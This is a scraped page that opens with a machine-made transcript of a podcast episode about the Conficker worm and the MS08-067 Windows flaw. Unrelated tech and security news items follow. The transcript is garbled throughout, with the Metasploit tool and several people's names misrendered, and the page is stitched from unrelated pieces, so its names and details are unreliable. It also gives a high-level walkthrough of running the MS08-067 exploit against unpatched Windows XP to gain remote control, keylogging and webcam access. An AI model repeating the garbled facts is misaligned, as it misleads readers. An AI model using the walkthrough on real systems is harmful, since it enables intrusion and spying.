Oh, something happened last week. That’s kind of interesting, too. Last week was Patch Tuesday and boy, was it a doozy. There was a bug patched. It was cryptographic API bug and Windows 10, which basically allows an attacker to pose as someone they aren’t in your computer could send trusted information to it. But here’s the thing. This bug was reported to Microsoft by the NSA. In fact, it was so important. The NSA even held a press conference to urge people to patch. This is very rare. I mean, we don’t know how many times the NSA has reported bugs to Microsoft. They could be doing this all the time. But we do know for sure that there were two times that they did do it once when shadow broker’s got the NSA exploits. And now again last week, the NSA says they told Microsoft because they want to build more trust with people and help keep computers secure. Really, it could be that a world is changing and new things are happening and the NSA might be doing this are now on to try to keep the country safer by working with vendors to get things patched. And in fact, they have done stuff like that for a while, but it’s all been small potatoes versus like the God mode bugs that the NSA keeps to themselves. So my theory is this the NSA gave this bug to Microsoft. Why? Maybe it was just to build better PR. OK. But then maybe the NSA knows something we don’t like. Maybe they uncovered a huge men in the middle campaign that some foreign government was doing to many Americans and thought it could have devastating results. So this was their way to stop it. Or maybe the NSA lost another exploit and didn’t want their enemy to have it. I don’t know. But I have a feeling there’s more to this story, though.

So back to Conficker, you might be wondering what happened there. And like I was saying, Conficker infected 10 million computers and was growing. However, it was a mystery as to what Conficker actually did or who made it or what it was supposed to do while it was infecting systems worldwide. It was apparently not doing anything. Once it was infected on a periodic basis, the computer that had Conficker running on it would reach out to certain domains to receive instructions on what to do next. But it just didn’t get any instructions to do. Security teams all over the world feared that maybe there were instructions to do on a particular day. And in fact, for some weird reason, we thought that on April 1st, 2009, there was gonna be some big surprise that Conficker was going to give us. I remember being in the office that day and setting up a conference bridge in a war room with everyone from I.T. and looking for signs of Conficker kicking up or something. But nothing happened. A few companies got really fed up with Conficker spreading everywhere, so they decided to do something about it. In February 2009, something called the Microsoft Cabal was formed.

This included people from Microsoft, Verizons, Neustar, America Online, Symantec, F-Secure, researchers from Georgia Tech and the Shadow Server Foundation and so many more organizations. It was a huge list of companies that came together to figure out a way to stop Conficker. They would do things like reverse engineer Conficker to see how it worked and then write fixes to block Conficker from spreading more. But then whoever made Conficker would change how it was infecting machines so it could keep infecting machines, creating a new variant of the worm. It became a game of cat and mouse with the security professionals blocking it and the worm creator getting around that. At some point, Microsoft said they’re willing to pay two hundred and fifty thousand dollars for information that leads up to the capture of whoever created the Conficker worm. They were taking this pretty serious. The FBI started getting involved and the hunt began to look for whoever was running this worm. The author, Mark BOWDEN, did some extraordinary research into this worm in his book, which is just titled Worm. He writes, There are a few theories on what Conficker was.

One is that it was just a security researcher playing around, making a crazy worm, but never intended to do any harm with it, just trying to see how big it could get. Another theory was that a government created this worm and was waiting for instructions to maybe attack on command or spy on people or something. But as more organizations joined the Microsoft cabal, the more effort put into looking into this and they may have found the answer.

They reverse engineered the code and did everything they could to trace it back to their creators. And they handed this information over to the FBI, who then arrested three Ukrainians. Sergei, Yev, Jan and Dmitri. These Ukrainians all were millionaires. They drove black Porsches and they lived in penthouse apartments. And their story was that they ran a Web site with employees and everything. And they paid themselves, but they weren’t paying themselves very much. And so they were arrested on tax evasion charges. And the feds seem to have found some evidence of Conficker code on their work computers. But I don’t think we have any idea what happened to the next. It doesn’t seem like the FBI was able to extradite them to the U.S. and they just disappeared into the Ukrainian courts.

But the FBI also arrested one other guy, a Swede named Mikhail. Mikhail was arrested in Denmark in connection with this and extradited to the U.S.. The court records don’t say anything about Conficker, though. Instead, the FBI found evidence that Macao was infecting computers and putting scare wear on them. This is where he would infect a computer and say there’s a virus on it and you need to buy this anti-virus. But when the victim buys the anti-virus, nothing actually gets fixed.

The FBI claims McKale made $71 million from his scare where campaigns, which is a really big haul to get that much. You must have had a lot of infected machines. And there was evidence in some of the variance of Conficker that it was capable of running scare aware. So it might have been getting ready to launch a big campaign to do just that, but it never did. McKale got two years in prison for his scare where scams that he was running and it’s alleged that he had ties to those Ukrainians who also got arrested over Conficker. So it seems like the best theory now was that Conficker was made by a group of Ukrainian cyber criminals who may have been planning on using it to send spam e-mails or running scared where to scam its victims, but they never got to it.

And what’s truly fascinating about Conficker is that it’s still out there infected on a ton of systems, even though M.S. 0 8 0 6 7 was passed in 2008. There are still computers out there that are running systems older than that that haven’t been patched still. And the latest estimate is that Conficker is still present on 400000 computers today.

M.s. 0 8 0 6 7, we’ll go down in history as one of the most notorious vulnerabilities in Windows ever. And the reason for it is because of how effective it is. I personally love playing around with this vulnerability and exploiting Windows computers with it because it’s so easy to do. And I want to walk you through how I’ve done it. First, you need a version of Windows from before 2008, which is actually quite easy. You just install Windows XP on a computer and don’t patch it. This will be vulnerable to it. Then you need to run this exploit against it. Now, instead of knowing what shell code to send to the computer and work all that out, there’s a crazy shortcut. It’s called med’s boyte. Medfly is an incredible hacking framework and has over a thousand exploits, all pre-programmed and ready to run. So you pick the M S 0 8 0 6 7 exploit, then point out your Windows XP machine type run and boom you’re in. Now when I mean you’re in, you’re really in menace. Boy has tools to allow you to use that computer you just infected as if you’re right in front of it. You can run any command you want on that computer all through the command line, take screenshots of the desktop and able to make enable the camera, run a keylogger to watch what someone types you can do.

All that and more. Menace Boy is an amazing hacker tool, which is a standard for any hacker to know how to use today. And the best part about Matus point is that it’s free and open source. Anyone can grab it, study a few commands and have over a thousand exploits ready at their fingertips. It’s really powerful fun to play with, and if you attend any ethical hacking training, chances are you’ll be given medals. Floyd and a system vulnerable with M.S. 0 8 0 6 7 as one of your first hacks you’ll do using it because it’s pretty easy to use and you can see how effective misplay can be. So because of that, penetration testers all over the world are very familiar with M.S. 0 8 0 6 7 and all have that number memorized. However, it’s now 20/20. So MSO 8 0 6 7 is a dozen years old now, which means there are far fewer computers running Windows XP or that are vulnerable to this attack. So this bug is losing its notoriety. It’s much more rare to find a system vulnerable to this today, but they do exist.

This story is another example on why it’s so important to update your software as soon as you can. However, it’s not always that easy. Some networks have very strict controls like they can’t patch. A patch might break everything. The applications and software running on the computers doesn’t always work with the latest OS updates applied and this quickly becomes a nightmare. I recently updated my home computer and a lot of the software that I was running stopped working, so I had to wait for each application maker to put out an update for me to be back up and working again. Something like this is totally unacceptable in critical networks like hospitals or power plants, so it’s not always as simple as just patching it. Like I was saying at the beginning, it’s a lot of different people’s jobs to keep our network secure. In this case, Microsoft did their job at finding a bug and issuing a patch for it. And now that fix needs to trickle all the way down to everyone’s computers because by being on the most up to date version, it is like giving yourself a vaccination to render yourself safe from the known attacks in the world. Updating your apps, operating systems and programs. In my opinion, is the single most effective thing you can do to protect yourself on the Internet today.

A big thank you to John Lambert from Microsoft for coming on the show and sharing this story with us. I found it to be really cool. Also, if you want to know more about Conficker, check out the book Worm by Mark BOWDEN. It goes into a lot of details about as Breguet. Hey, if you’re all caught up with this podcast and want more episodes, check out The Dark Knight Diaries Patry on page and you can find bonus episodes there. The show is made by Meet the Cyber Ghost, Jack Reciter Music and this episode was special. Typically I grab songs from all over, but in this one every single song was created by the top talented brake master cylinder. And even though hoodies go up and drawstrings get pulled tight every time I see it, this is Darknet Diaries.

(function(s,o,n,i,x) {
if(s[n])return;s[n]=true;
var j=o.createElement(‘script’);j.type=’text/javascript’,j.async=true,j.src=i,o.head.appendChild(j);
var css=o.createElement(“link”);css.type=”text/css”,css.rel=”stylesheet”,css.href=x,o.head.appendChild(css)
})(window,document, “__sonix”,”//sonix.ai/widget.js”,”//sonix.ai/widget.css”);


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Turbo Systems hires former Looker CMO Jen Grant as CEO

Turbo Systems, a three-year old, no-code mobile app startup, announced today it has brought on industry veteran Jen Grant to be CEO.

Grant, who was previously vice president of marketing at Box and chief marketing officer at Elastic and Looker, brings more than 15 years of tech company experience to the young startup.

She says that when Looker got acquired by Google last June for $2.6 billion, she began looking for her next opportunity. She had done a stint with Google as a product manager earlier in her career and was looking for something new.

She saw Looker as a model for the kind of company she wanted to join, one that had a founder focused on product and engineering, who hired an outside CEO early on to run the business, as Looker had done. She found that in Turbo where founder Hari Subramanian was taking on that type of role. Subramanian was also a successful entrepreneur, having previously founded ServiceMax before selling it to GE in 2016.

“The first thing that really drew me to Turbo was this partnership with Hari,” Grant told TechCrunch. While that relationship was a key component for her, she says even with that, before she decided to join, she spoke to customers and she saw an enthusiasm there that drew her to the company.

“I love products that actually help people. And so Box is helping people collaborate and share files and work together. Looker is about getting data to everyone in the organization so that everyone could be making great decisions, and at Turbo we’re making it easy for anyone to create a mobile app that helps run their business,” she said.

Grant has been on the job for just 30 days, joining the company in the middle of a global pandemic. So it’s even more challenging than the typical early days for any new CEO, but she is looking forward and trying to help her 36 employees navigate this situation.

“You know, I didn’t know that this is what would happen in my first 30 days, but what inspires me, what’s a big part of it is that I can help by growing this company, by being successful and by being able to hire more and more people, and contribute to getting our economy back on track,” Grant said.

She also recognizes that there is a lack of diversity in her new CEO role, and she hopes to be a role model. “I have been fortunate to get to a position where I know I can do this job and do it well. And it’s my responsibility to do this work, my responsibility to show it can be done and shouldn’t be an anomaly.”

Turbo Systems was founded in 2017 and has raised $8 million, according to Crunchbase. It helps companies build mobile apps without coding, connecting to 140 different data sources such as Salesforce, SAP and Oracle.

SMB loans platform Kabbage to furlough a ‘significant’ number of staff, close office in Bangalore

Another tech unicorn is feeling the pinch of doing business during the coronavirus pandemic. Today, Kabbage, the SoftBank-backed lending startup that uses machine learning to evaluate loan applications for small and medium businesses, is furloughing a “significant number” of its U.S. team of 500 employees, according to a memo sent to staff and seen by TechCrunch, in the wake of drastically changed business conditions for the company. It is also completely closing down its office in Bangalore, India, and executive staff is taking a “considerable” pay cut.

The announcement is effective immediately and was made to staff earlier today by way of a video conference call, as the whole company is currently remote working in the current conditions.

Kabbage is not disclosing the full number of staff that are being affected by the news (if you know, you can contact us anonymously). It’s also not putting a time frame on how long the furlough will last, but it’s going to continue providing benefits to affected employees. The intention is to bring them back on when things shift again.

“We realize this is a shock to everyone. No business in the world could have prepared for what has transpired these past few weeks and everyone has been impacted,” co-founder and CEO Rob Frohwein wrote in the memo. “The economic fallout of this virus has rattled the small business community to which Kabbage is directly linked. It’s painful to say goodbye to our friends and colleagues in Bangalore and to furlough a number of U.S. team members. While the duration of the furlough remains uncertain, please bear in mind that the full intention of furloughing is temporary. We simply have no clear idea of how long quarantining or its reverberations in the economy will last.”

Kabbage’s predicament underscores the complicated and stressful calculus faced by tech companies built around providing services to SMBs, or fintech (or both, as in the case of Kabbage).

SMBs are struggling right now in the U.S.: many operate on very short terms when it comes to finances, and closing their businesses (or seeing a drastic reduction in custom) means they will not have the cash to last 10 days without revenue, “and we’re already well past that window,” Frohwein noted in his memo.

In Kabbage’s case, that means not only are SMBs not able to be evaluated and approved for normal loans at the moment, but SMBs that already have loans out are likely facing delinquencies.

The decision to furlough is hard but in relative terms it’s good news: it was made at the eleventh hour after a period when Kabbage was considering layoffs instead.

The company has raised hundreds of millions of dollars in equity and debt, and it was in a healthy state before the coronavirus outbreak. The memo notes that the “board and our top investors are aware of the challenges we are facing and have committed to helping us through this period,” although it doesn’t specify what that means in terms of financial support for the business, and whether that support would have been there for the business as-is.

The shift to furlough from layoffs came in the wake of an announcement yesterday by Steven Mnuchin, the U.S. Secretary of the Treasury, who clarified that “any FDIC bank, any credit union, any fintech lender will be authorized” to make loans to small businesses as a part of the U.S. government’s CARE Act, the giant stimulus package that included nearly $350 billion in loan guarantees for small businesses.

While that provides much-needed relief for these businesses, the implementation of it — the Small Business Administration has already received nearly 1 million claims for disaster-relief loans since the crisis started — has been and is going to be a challenge.

That effectively opens up an opportunity for Kabbage and companies like it to revive and reorient some of its business. (Its USP was always that the AI it uses, which draws on a number of different sources of online data for the business, means a more creative, faster and more accurate assessment of loan applications than what traditional banks typically provide.) Kabbage said it is in “deep discussions” with the Treasury Department, the White House and the Small Business Administration to help expedite applications for aid.

While loans still make up the majority of Kabbage’s business, the company has been making a move to diversify its services, and in recent times it has made acquisitions and launched new services around market intelligence insights and payments services. While there has certainly been a jump in e-commerce, overall the tightening economy will have a chilling effect on the wider market, and it will be worth seeing what happens with other tech companies that focus on loans, as well as adjacent financial services.

Atlassian’s Confluence gets a new template gallery

Confluence, Atlassian’s content-centric collaboration tool for teams, is making it easier for new users to get started with the launch of an updated template gallery and 75 new templates. They incorporate what the company has learned from its customers and partners since it first launched the service back in 2004.

About a year ago, Atlassian gave Confluence a major makeover, with an updated editor and advanced analytics. Today’s update isn’t quite as dramatic, but goes to show that Confluence has evolved from a niche wiki for technical documentation teams to a tool that is often used across organizations today.

About 60,000 customers are using Confluence daily, and the new templates reflect the different needs of these companies. The new template gallery will make it easier to find the specific template that makes sense for your business, with new search tools, filters and previews that you can find in the right-hand panel of your Confluence site.

The updated gallery features new templates for design, marketing and HR teams, for example. Working with partners, Atlassian also added templates like a job description guide from Indeed and a design system template from InVision, as well as similar use case-specific templates from HubSpot, Optimizely and others. Because most tasks take more than one template, Atlassian is also launching collections of templates for accomplishing more complex tasks around developing marketing strategies, HR workflows, product development and more.

Annual Protest to ‘Fight Krebs’ Raises €150K+

In 2018, KrebsOnSecurity unmasked the creators of Coinhive — a now-defunct cryptocurrency mining service that was being massively abused by cybercriminals — as the administrators of a popular German language image-hosting forum. In protest of that story, forum members donated hundreds of thousands of euros to nonprofits that combat cancer (Krebs means “cancer” in German). This week, the forum is celebrating its third annual observance of that protest to “fight Krebs,” albeit with a Coronavirus twist.

Images posted to the decidedly not-safe-for-work German-language image forum pr0gramm[.]com. Members have posted a large number of ‘thank you’ receipts from cancer research organizations that benefited from their fight cancer/krebs campaign.

On March 26, 2018, KrebsOnSecurity published Who and What is Coinhive, which showed the founder of Coinhive was the co-creator of the German forum pr0gramm[dot]com (not safe for work).  I undertook the research because Coinhive’s code at the time was found on tens of thousands of hacked Web sites, and Coinhive seemed uninterested in curbing widespread abuse of its platform.

Pr0gramm’s top members accused KrebsOnSecurity of violating their privacy, even though all of the research published about them was publicly available online. In protest, the forum’s leaders urged members to donate money to medical research in a bid to find a cure for Krebs (i.e. “cancer”). They ended up raising more than a quarter-million dollars worth of donations from members.

Last year’s commemoration of the protest fundraiser — dubbed “Krebsaction” by Pr0gramm — raised almost $300,000 for anti-cancer research groups. Interestingly, Coinhive announced it was shutting down around the same time as that second annual fundraiser.

This year’s Krebsaction started roughly three days ago and so far has raised more than 150,000 euros (~$165,000), with many Pr0gramm members posting screenshots of their online donations. The primary beneficiary appears to be DKMS, a German nonprofit that works to combat various blood cancers, such as leukemia and lymphoma.

The pr0gramm post kicking off this year’s “Krebsaction” fundraiser.

This year, however, Pr0gramm’s administrators exhorted forum members to go beyond just merely donating money to a worthy cause, and encouraged them to do something to help those most affected by the COVID-19/Coronavirus pandemic.

“This year pr0gramm-members shall not only donate but do a good act in terms of corona (and prove it), for example bring food to old people, bring proof of volunteering and such stuff,” reads the Pr0gramm image kicking off this year’s Krebsaction.  The message further states, “Posts mit geringem Einsatz können wir nicht akzeptieren,” which translates roughly to “Posts with little effort we cannot accept.”

The Good, the Bad and the Ugly in Cybersecurity – Week 13

This week has been unlike any other week. While everyone’s minds are on keeping our loved ones safe in these days of uncertainty, many are trying to adapt to the era of remote work. For those who have kids, it requires us to switch between being parents, teachers and workers. Despite that, cyberland is as active as it can get, so hang tight, and let’s see what happened this week.

The Good

There are plenty of good things around, and cybersecurity is no different. Starting with UK_Daniel_Card, Lisa Forte and Radslaw Gnat who came up with the brilliant idea of forming a cyber task force to protect healthcare institutes during this time when they are on the frontline of the war against COVID-19. If you want to take part, visit the EU based initiative for “Cyber volunteers to help healthcare providers in Europe during the COVID-19 outbreak”. Dan and his partners report that more local initiatives in different countries are doing the same. 

In Israel, the Ministry of Health and a number of volunteers joined forces to create an app, the “Hamagen” Application that maintains privacy while allowing users to check whether they’ve come into contact with a COVID-19 patient. They also made the project open-source both so that other groups can reuse the code and that the privacy aspects are publicly known. 

Hamagen Application - Fighting the Coronavirus

More good news on the fight against COVID-19 can be found at #COVID19GoodNews.

The Bad

Again Microsoft, and again Adobe with a new Type 1 Font Parsing Remote Code Execution Vulnerability. The vuln resides in the Windows Adobe Type Manager Library, a font parsing software that not only parses content when opened with 3rd-party software such as Adobe Acrobat and Adobe Reader, but which is also used by Windows Explorer to display the contents of a file in the ‘Preview Pane’ or ‘Details Pane’ without opening the actual file. Until there’s a fix, the flaw can affect anyone as all versions of Windows, including Windows 10, are affected, although the danger is most severe on Windows 7 devices. The vulnerability is being actively exploited in the wild, according to Microsoft. If a next-gen behavioral-based solution protects your endpoints, you have a good chance to detect earlier or later stages of any such exploitation attempts, but if not you will need to wait for a patch (and please patch it asap). For Windows 7 users, Microsoft suggests some workarounds here.

image of tweet about Windows RCE vulnerability

The Ugly

Well, there is plenty of that this week. One that is worth covering is the behavior of the Maze group, which has been responsible for a large number of ransomware attacks recently and also leaks enterprise information to the public if the victim refuses to pay. We noted that last week the ransomware operators made a statement that they would refrain from attacking healthcare institutes after Vitali Kremez called them out. It took less than 48 hours for this pledge to be broken.

image of tweet from Vitali Kremez about Maze ransomware continuing to attack healthcare providers during COVID 19 pandemic

Meanwhile, Ryuk ransomware operators continue attacking vital services during the pandemic. It seems there is no limit to the lack of humanity in some people. Guys, we are all in it together, and you and your loved one may be in need of the very services you are crippling for profit.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Yaguara nabs $7.2M seed to help e-commerce companies understand customers better

Yaguara, a Denver-based startup that wants to help e-commerce companies understand their customers better to deliver more meaningful experiences, announced a $7.2 million seed investment today.

The round was led by Foundation Capital with participation from Gradient Ventures, Rainfall Ventures and Zelkova. It also had help from some e-commerce heavy hitters including Warby Parker, Harry’s and Allbirds.

Yaguara CEO Jonathan Smalley was working at an agency building specialized cloud tools for online businesses when he recognized there was a need to pull data together into a single place and help companies understand their customer’s behavior better.

“Yaguara is based on integrating data and having all their data in the right place. For us, it started with several dozen tools from performance marketing to your actual e-commerce data to your fulfillment and unit economic data — bringing that all into one place letting them see their data in real time.”

“Then our platform serves predictive and prescriptive insights and recommendations to individual users across your teams, so they can drive specific outcomes across the organization based on that unified data set,” Smalley explained.

Screenshot: Yaguara

They build that data set by connecting to a variety of popular tools to help understand what’s happening across the customer lifecycle, whether that’s customer acquisition through Facebook or Google ads or understanding shopping cart abandonment data or how often the customer has returned to buy again, all of which help build a better picture of the customer.

While this may sound like a customer data platform (CDP), Smalley says it’s actually more than that. While the CDP provides the pipeline to your data sources like Yaguara, it doesn’t stop there. He says it reduces the complexity of helping front-line marketing personnel access and query that data without having to know SQL or R or have a technical intermediary to understand the data.

While the company is young it already has 250 e-commerce customers using the platform. With the new infusion of cash, it should be able to bring in more employees, build more data connectors and continue working to build out the platform.

Kaizo raises $3M for its AI-based tools to improve customer service support teams

CRM has for years been primarily a story of software to manage customer contacts, data to help agents do their jobs, and tools to manage incoming requests and outreach strategies. Now to add to that we’re starting to see a new theme: apps to help agents track how they work and to work better.

Today comes the latest startup in that category, a Dutch company called Kaizo, which uses AI and gamification to provide feedback on agents’ work, tips on what to do differently, and tools to set and work to goals — all of which can be used remotely, in the cloud. Today, it is announcing $3 million in a seed round of funding co-led by Gradient — Google’s AI venture fund — and French VC Partech. 

And along with the seed round, Kaizo (which rebranded last week from its former name, Ticketless) is announcing that Christoph Auer-Welsbach, a former partner at IBM Ventures, is joining the company as a co-founder, alongside founder Dominik Blattner. 

Although this is just a seed round, it’s coming after a period of strong growth for the company. Kaizo has already 500 companies including Truecaller, SimpleSurance, Miro, CreditRepairCloud, Justpark, Festicket and Nmbrs are using its software, covering “thousands” of customer support agents, which use a mixture of free and paid tools that integrate with established CRM software from the likes of Salesforce, Zendesk and more.

Customer service, and the idea of gamifying it to motivate employees, might feel like the last thing on people’s minds at the moment, but it is actually timely and relevant to our current state in responding to and living with the coronavirus.

People are spending much more time at home, and are turning to the internet and remote services to get what they need, and in many cases are finding that their best-laid plans are now in freefall. Both of these are driving a lot of traffic to sites and primarily customer support centers, which are getting overwhelmed with people reaching out for help.

And that’s before you consider how customer support teams might be impacted by coronavirus and the many mandates we’ve had to stay away from work, and the stresses they may be under.

“In our current social climate, customer support is an integral part of a company’s stability and growth that has embraced remote work to meet the demands of a globalized customer-base,” said Dominik Blattner, founder of Kaizo, in a statement. “With the rise of support teams utilizing a digital workplace, providing standards to measure an agent’s performance has never been more important. KPIs provide these standards, quantifying the success, achievement and contribution of each team member.”

On a more general level, Kaizo is also changing the conversation around how to improve one’s productivity. There has been a larger push for “quantified self” platforms, which has very much played out both in workplaces and in our personal lives, but a lot of services to track performance have focused on both managers and employees leaning in with a lot of input. That means if they don’t set aside the time to do that, the platforms never quite work the way they should.

This is where the AI element of Kaizo plays a key role, by taking on the need to proactively report into a system.

“This is how we’re distinct,” Auer-Welsbach said in an interview. “Normally KPIs are top-down. They are about people setting goals and then reporting they’ve done something. This is a bottom-up approach. We’re not trying to change employees’ behaviour. We plug into whatever environment they are using, and then our tool monitors. The employee doesn’t have to report or measure anything. We track clicks on the CRM, ticketing, and more, and we analyse all that.” He notes that Kaizo is looking at up to 50 datapoints in its analysis.

“We’re excited about Kaizo’s novel approach to applying AI to existing ticket data from platforms like Zendesk and Salesforce to optimize the customer support workflow,” said Darian Shirazi, General Partner at Gradient Ventures, in a statement. “Using machine learning, Kaizo understands which behaviors in customer service tickets lead to better outcomes for customers and then guides agents to replicate that using ongoing game mechanics. Customer support and service platforms today are failing to leverage data in the right way to make the life of agents easier and more effective. The demand Kaizo has seen since they launched on the Zendesk Marketplace shows agents have been waiting for such a solution for some time.”

Kaizo is not the only startup to have identified the area of building new services to improve the performance of customer support teams. Assembled earlier this month also raised $3.1 million led by Stripe for what it describes as the “operating system” for customer support.

Salesforce’s Benioff pledges no ‘significant’ layoffs for 90 days

In a Twitter thread on Tuesday, Salesforce CEO Marc Benioff outlined an eight-step plan to keep people safe and find treatments and a vaccine for the COVID-19 virus, all while working to find a way to get people back to work safely. He also asked that all CEOs take a 90-day “no lay off” pledge to help everyone get through the crisis.

The same day, he posted another tweet pledging to not make any “significant” layoffs for 90 days. When TechCrunch asked Salesforce to comment on the difference between the two tweets, the company chose not to comment any further on the matter and let the tweets stand on their own.

It sounds like Benioff’s second tweet, which also asked employees to consider paying their own hourly workers like housekeepers and dog walkers throughout the layoff period, whether they were working or not, was designed to give the CEO some wiggle room for at least some layoffs.

Salesforce has almost 50,000 employees worldwide. Even if the company were to lay off just 1% of employees it would equal 500 people without jobs, though it’s not clear if that would count as “significant.” Perhaps more likely, the company might make some cuts to staff for performance or HR-related reasons, but not broad cuts, and thus make both of its CEO’s claims essentially true.

Salesforce is a wildly successful company. It celebrated its 20th anniversary last fall and has grown from a pesky startup to a software behemoth with a projected revenue of over $20 billion for FY2021. It currently has almost $8 billion in cash and equivalents on hand. Certainly companies that use Salesforce’s products will continue to need them, even with the workforce at home.

While it could have an impact on that projection for FY2021 and its ability to land new customers this quarter, it seems like it has the money and revenue to ride out the situation for the short term without making any moves to reduce headcount at this critical time.

Microsoft acquires 5G specialist Affirmed Networks

Microsoft today announced that it has acquired Affirmed Networks, a company that specializes in fully virtualized, cloud-native networking solutions for telecom operators.

With its focus on 5G and edge computing, Affirmed looks like the ideal acquisition target for a large cloud provider looking to get deeper into the telco business. According to Crunchbase, Affirmed raised a total of $155 million before this acquisition, and the company’s more than 100 enterprise customers include the likes of AT&T, Orange, Vodafone, Telus, Turkcell and STC.

“As we’ve seen with other technology transformations, we believe that software can play an important role in helping advance 5G and deliver new network solutions that offer step-change advancements in speed, cost and security,” writes Yousef Khalidi, Microsoft’s corporate vice president for Azure Networking. “There is a significant opportunity for both incumbents and new players across the industry to innovate, collaborate and create new markets, serving the networking and edge computing needs of our mutual customers.”

With its customer base, Affirmed gives Microsoft another entry point into the telecom industry. Previously, the telcos would often build their own data centers and stuff it with costly proprietary hardware (and the software to manage it). But thanks to today’s virtualization technologies, the large cloud platforms are now able to offer the same capabilities and reliability without any of the cost. And unsurprisingly, a new technology like 5G, with its promise of new and expanded markets, makes for a good moment to push forward with these new technologies.

Google recently made some moves in this direction with its Anthos for Telecom and Global Mobile Edge Cloud, too. Chances are we will see all of the large cloud providers continue to go after this market in the coming months.

In a somewhat odd move, only yesterday Affirmed announced a new CEO and president, Anand Krishnamurthy. It’s not often that we see these kinds of executive moves hours before a company announces its acquisition.

The announcement doesn’t feature a single hint at today’s news and includes all of the usual cliches we’ve come to expect from a press release that announces a new CEO. “We are thankful to Hassan for his vision and commitment in guiding the company through this extraordinary journey and positioning us for tremendous success in the future,” Krishnamurthy wrote at the time. “It is my honor to lead Affirmed as we continue to drive this incredible transformation in our industry.”

We asked Affirmed for some more background about this and will update this post if we hear more. Update: an Affirmed spokesperson told us that this was “part of a succession plan that had been determined previously.  So it was not related [to] any specific event.”